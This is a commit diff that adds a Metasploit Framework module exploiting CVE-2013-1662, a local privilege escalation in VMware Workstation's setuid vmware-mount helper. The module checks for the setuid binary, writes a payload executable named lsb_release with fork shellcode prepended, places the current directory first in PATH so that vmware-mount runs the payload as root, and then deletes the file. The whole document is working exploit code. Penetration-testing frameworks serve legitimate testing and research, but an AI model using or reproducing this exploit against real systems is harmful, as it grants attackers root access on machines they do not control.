Land #2289, @jlee-r7's exploit for CVE-2013-1662

modules/exploits/linux/local/vmware_mount.rb

@@ -0,0 +1,99 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit4 < Msf::Exploit::Local
+
+	include Msf::Exploit::EXE
+	include Msf::Post::Common
+	include Msf::Post::File
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'          => 'VMWare Setuid vmware-mount Unsafe popen',
+				'Description'   => %q{
+					VMWare Workstation (up to and including 9.0.2 build-1031769)
+					and Player have a setuid executable called vmware-mount that
+					invokes lsb_release in the PATH with popen(3). Since PATH is
+					user-controlled, and the default system shell on
+					Debian-derived distributions does not drop privs, we can put
+					an arbitrary payload in an executable called lsb_release and
+					have vmware-mount happily execute it as root for us.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'egypt'],
+				'Platform'      => [ 'linux' ],
+				'Arch'          => ARCH_X86,
+				'Targets'       =>
+					[
+						[ 'Automatic', { } ],
+					],
+				'DefaultOptions' => {
+					"PrependSetresuid" => true,
+					"PrependSetresgid" => true,
+				},
+				'Privileged'     => true,
+				'DefaultTarget' => 0,
+				'References' => [
+					[ 'CVE', '2013-1662' ],
+					[ 'OSVDB', '96588' ],
+					[ 'BID', '61966'],
+					[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
+					[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
+				],
+				'DisclosureDate' => "Aug 22 2013"
+			}
+			))
+		# Handled by ghetto hardcoding below.
+		deregister_options("PrependFork")
+	end
+
+	def check
+		if setuid?("/usr/bin/vmware-mount")
+			CheckCode::Vulnerable
+		else
+			CheckCode::Safe
+		end
+	end
+
+	def exploit
+		unless check == CheckCode::Vulnerable
+			fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
+		end
+
+		# Ghetto PrependFork action which is apparently only implemented for
+		# Meterpreter.
+		# XXX Put this in a mixin somewhere
+		# if(fork()) exit(0);
+		# 6A02              push byte +0x2
+		# 58                pop eax
+		# CD80              int 0x80 ; fork
+		# 85C0              test eax,eax
+		# 7406              jz 0xf
+		# 31C0              xor eax,eax
+		# B001              mov al,0x1
+		# CD80              int 0x80 ; exit
+		exe = generate_payload_exe(
+			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
+		)
+		write_file("lsb_release", exe)
+
+		cmd_exec("chmod +x lsb_release")
+		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+		cmd_exec("rm -f lsb_release") # using it over FileDropper because the original session can clean it up
+	end
+
+	def setuid?(remote_file)
+		!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
+	end
+
+end
+